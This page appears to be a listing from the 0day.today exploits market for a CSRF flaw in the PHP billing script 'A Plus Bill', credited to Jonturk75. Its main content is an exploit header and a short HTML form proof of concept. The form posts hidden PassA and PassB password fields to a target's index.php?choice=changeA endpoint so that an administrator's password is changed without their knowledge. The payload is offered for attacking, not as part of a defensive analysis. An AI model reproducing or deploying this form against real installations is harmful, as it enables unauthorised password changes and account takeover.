[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

A Plus Bill CSRF Vulnerability

Author
Jonturk75
Risk
[
Security Risk Low
]
0day-ID
0day-ID-17837
Category
web applications
Date add
26-03-2012
Platform
php
# Exploit Title: A Plus Bill CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/a-plus-bill/1457/
# Category::  webapps
# Demo : http://www.softwareplusweb.com/billingDemo/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com

<FORM METHOD="post" ACTION="target.com/[PATH]/index.php?choice=changeA" onsubmit="return validateChange(this)" >
<input name="PassA" value="" size="20" maxlength="9" type="hidden">		
<input name="PassB" value="" size="20" maxlength="9" type="hidden">
<input value="Change" name="B1" class="button3" type="button">
</form>



#  0day.today [2024-11-15]  #